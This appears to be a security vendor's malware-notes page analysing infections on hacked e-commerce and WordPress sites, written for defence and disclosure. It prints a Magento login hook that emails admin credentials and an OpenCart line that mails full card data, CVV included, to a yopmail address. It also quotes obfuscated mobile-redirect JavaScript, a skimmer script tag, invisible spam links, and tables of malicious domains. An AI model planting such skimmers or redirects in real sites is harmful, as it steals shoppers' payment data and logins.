Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We posted a few times about this type of malware, but this one is a bit different in a way that it also steals the login credentials for the website users. All the ones we analyzed before never had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails to XXX@XXX.com every login and password:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
	...skipped code...
	protected function testReview($username, $password, $email)
	{
	    $to = 'removed@removed.dom';
	    $subject = 'Webserver';
	    $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
	    $headers = 'From: removed@removed.dom' . "\r\n" .
	        'Reply-To: removed@removed.dom' . "\r\n" .
	        'X-Mailer: PHP/' . phpversion();
            	
	    mail($to, $subject, $message, $headers);
	}
	...skipped code...
    public function login($username, $password, $request = null) {
    ...skipped code...
	if ($user->getId()) {
				$this->testReview($username, $password, $user->getEmail());
                $this->renewSession();
               	...skipped code...
...skipped code...

This is the first time we see a malware on Magento that actually steals credentials alongside with credit card numbers. If you're using Magento as e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.

We have previously analyzed many Credit Card stealers code, specially targeting the Magento platform:

However, this type of malicious code is not only being used against Magento, as we see if often on other ecommerce platforms. To give an example, we were analyzing a compromised OpenCart site and found the following entry on the file:

catalog/controller/payment/authorizenet_aim.php
$smail=$order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname'].
"|".$order_info['payment_address_1']."|".$order_info['payment_city']."|"
.$order_info['payment_postcode']."|".$order_info['payment_zone']."
|".$order_info['payment_country']."|".$order_info['telephone']."|".$this->request->post['cc_expire_date_month'].
"|".$this->request->post['cc_expire_date_year']."|".$this->request->post['cc_cvv2']."|".$this->
request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com","infectedOpenCart",$smail,"From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP, this code gets all credit card transaction data (including name, address, CVV, etc) and email to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a domain that allows the use of disposable e-mail inboxes.

As you can see, ecommerce sites (and customers) have a lot more to lose when they get compromised as they process and deal with critical information from their users. Whenever possible, we recommend using 3rd party providers, like Stripe or Paypal to reduce your PCI scope and do not allow credit card data to pass through your site.

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.

We recently found a website that was redirecting mobile users to a third-party site called chickenkiller .com, after further investigation we found that the malware was actually injected into the database, the code was hex encoded to prevent users from being able to search for the domain in the malicious code.

The malware was stored in: wp_options -> FieldName: option_value -> ID: 3284 (this value may not be the same on every infection)

Here's a snippet of the code you may find on infected sites:

a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=[&quot;\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65&quot;,"\x3D"
,"\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"
,"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];
if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]]
(navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};

This malware's obfuscation technique is not too complex, when deobfuscated, the most interesting part is the conditional redirect, which tells us that the malware had two different final URLs depending on which flavor of the mobile OS:

    if (!readCookie("wpkj") {
        createCookie("wpkj", "test", 1);
        if (/iPhone|iPad|iPod/i ["test"](navigator["userAgent"])) {
            window[location] = "http:// load-me.chickenkiller .com/5972"
        } else {
            if (/Android/i ["wpkj"](navigator["test"])) {
                window[location] = "http:// load-me.chickenkiller .com/596F"
            }
        };
    };

What we learn form this sample is that checking only your site's files for anomalies is not enough. Once an attack happens, the attacker can add malicious content to your site's database. It could be a backdoor or a malicious redirect for mobile phones.

In black hat SEO schemes, some links don't have to have descriptive anchor keywords. For example, if their only purpose is help search engine crawlers discover newly created doorways. But even in such cases, the links should be hidden from webmasters of the hacked sites where they are placed on.

Recently, our malware analyst Douglas Santos notified the labs about an increased number of cases of database spam infections where (mostly) pharma links were injected inside the legit blog posts. What's interesting about those infections is how hackers make the links invisible. In this case, they didn't add any invisible blocks, didn't add any additional text at all. They just made links out of some parts of existing blog content. Of course they realized that underlines and changing mouse would reveal that some words unexpectedly became clickable. To minimize the exposure, hackers 1). used the text-decoration:none style to get rid of underlines, 2). used the text parts with smallest footprints - periods at the end of sentences.

... some legitimate text
<a style="text-decoration:none" href="/index.php?w=coversyl-online-bestellen-legal">.</a>

Such links are virtually invisible to human visitors and at the same time when search engines crawl the compromised sites, they discover links to spammy doorways (e.g http://infectedwebsite .com/index.php?w=coversyl-online-bestellen-legal in this particular case).

This trick is smart but it may only fool people who rely on visual web page inspection only. To security scanners like SiteCheck or Unmask Parasites such period-links are as visible as any other types of links so the infection gets easily detected.

To make malicious injections look less suspicious, hackers like to use domains that look credible. It may be some typo domain like google-analystisc[.]com instead of google-analytics.com, or correct domain names under a different TLDs, e.g.: ads.googleadservices[.]at or googleads.g.doubleclick[.]cn.com.

Sometimes they hide their scripts and iframes befind shortened URL. Other times they upload malicious content to public services like Pastebin.

This time we discovered a script injection that used site's alternative domain name provided by its host for free to their clients. In this case the malicious script was placed on a hacked site hosted on a Network Solutions' server. So instead of using the real domain name, which could alert the webmaster of the hacked site when the domain gets blacklisted, hackers used its alternative 0055d7b.netsolhost[.]com address.

We found this code injected into multiple design/head/includes rows (different scopes) of the core_config_data table in the Magento database:

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>

The script looks like coming from some Network Solutions CDN. However, it's a malicious script on a site where everything below /Blog was created by hackers (e.g. you can find a PHProxy script under Blog/lib2/ - the tool that hackers use to make anonymous requests to third-party sites, e.g. access backdoors). The js.js script itself adds extra handlers that intercept all data entered into all HTML forms on the infected Magento site and send them to a PHP script on the same Networks Solution server 0055d7b .netsolhost[.]com/Blog/lib2/js/main.php. Technically, the script is used to steal credit card and other sensitive payment details from order forms on e-commerce sites (although it can be used to steal credentials from login forms too).

Don't trust third-party content just because it uses a reputable domain name. Always doublecheck everything that you don't recognize or don't believe should be on your site. Test your database and files on server for integrity, and monitor your site for security issues.

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
20iframehttp://sellads.eu/p_n/m_b/b_s_f.php
18iframehttp://moddisright.top/?aff=333009
16iframehttp://mqzitpqr.hopto.org/wordpress/?ARX8
11iframehttp://hjtkglmo.hopto.org/wordpress/?ARX8
10iframehttp://freebitco.in/?r=528435
9iframehttp://www.linkarus.com/1/60T/buy-neopoints-buynpsorg-buy-cheap-neopoints
9iframehttp://www.777seo.com/seo.php
9iframehttp://utkarshavidyalaya.org/css/css_old/bindex.php
5iframehttp://www.cascadecowcutters.org/wp-content/upgrade/update.php
4iframehttp://ekrasetfg.hopto.org/wordpress/?ARX8
1iframehttp://www.omeopatiaescienza.it/wp-content/uploads/update.php
1iframehttp://rxsvbh.ddnsking.com/wordpress/?ARX8
1iframehttp://qwbzuzju.hopto.org/wordpress/?ARX8
Limited view... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
67redirectionshttp://go60.ru
9redirectionshttp://default7.com
7redirectionshttp://dp.000.in/
3redirectionshttp://myshokolad.ru/in.cgi?8
3redirectionshttp://mediciron.ru/
3redirectionshttp://best.ananoff.ru/
2redirectionshttp://traf-extractor.ru
2redirectionshttp://rajdhaniwap.in
2redirectionshttp://decmexico.com/includes/domit/1.php
2redirectionshttp://candice-accola.org/mocf.html?h=741187
1redirectionshttp://xvidgos.com/?folio=9PO6Z3MVF
1redirectionshttp://www.teleate.info/?folio=9PO6Z3MVF
1redirectionshttp://www.pornvideo.us.com/?folio=9PO6Z3MVF
1redirectionshttp://ww1.tradehomeshoes.com/?folio=9PO6Z3MVF
1redirectionshttp://ww1.the-hole.net/?folio=9POGF6H4I
1redirectionshttp://ww1.read--me.com/?folio=9POGF6H4I
1redirectionshttp://ww1.queroserambev.com/?folio=9POGF6H4I
1redirectionshttp://ww1.electros.net/?folio=9POGF6H4I
1redirectionshttp://ww1.bonsai4android.com/?folio=9POGF6H4I
1redirectionshttp://usaexportimport.com/?folio=9PO6Z3MVF
Limited view... Only the top entries being displayed.

Spammers

Latest spammers we have detected sending comment, forum or SEO spam.

# of sites infectedTypeMalware / Domains
20spammerhttp://123livesex.com/,forumspam,2014-01
20spammerhttp://20min.ch,forumspam,2014-01
20spammerhttp://90210daily.com/,forumspam,2014-01
20spammerhttp://EzAdBlaster.com,forumspam,2014-01
20spammerhttp://absolutefringe.com,forumspam,2014-01
20spammerhttp://adaptfunrun.org/,forumspam,2014-01
20spammerhttp://andresmarcossanchez.com/MichaelKors/ ,forumspam,2014-01
20spammerhttp://appliancelandinc.com/,forumspam,2014-01
20spammerhttp://audiobookkeeper.ru/,forumspam,2014-01
20spammerhttp://australiainternetsearch.com/,forumspam,2014-01
20spammerhttp://autism.sedl.org/index.php/about-us,forumspam,2014-01
20spammerhttp://axanaxplease.com/,forumspam,2014-01
20spammerhttp://ayurvedatradicional.com/wordpress/ ,forumspam,2014-01
20spammerhttp://azezhomeloans.com/body.html,forumspam,2014-01
20spammerhttp://baltimorecomiccon.com/sponsors/,forumspam,2014-01
20spammerhttp://bashkiaprrenjas.com/,forumspam,2014-01
20spammerhttp://bellezzaamica.it/Moncler-Sale-With-Free-Shipping.html,forumspam,2014-01
20spammerhttp://birdsofstkittsnevis.com/files/,forumspam,2014-01
20spammerhttp://bmaphoenix.org/young-professionals/,forumspam,2014-01
20spammerhttp://bradblaze.com.au/,forumspam,2014-01
Limited view... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
6javascripthttp://emedjimurje.rtl.hr/": /*<![CDATA[*/var s="=jgsbnf!tsd>#iuuq;00fnfekjnvskf/sum/is0#!xjeui...
3javascripthttp://rencontres.itemsz.com/main.php": document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61...
2javascripthttp://www.devilscafe.in": document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28...
2javascripthttp://div-class-container.ru/m/": var a123971=[920,980,1020,1025,1038,952,1035,1036,1041,1028,...
194javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
103javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
87javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
85javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
65javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
64javascript<script type="text/javascript" src="http://g00.co/P4YrUf"></script>
60javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
58javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
51javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
50javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
46javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
Limited view... Only the top entries being displayed.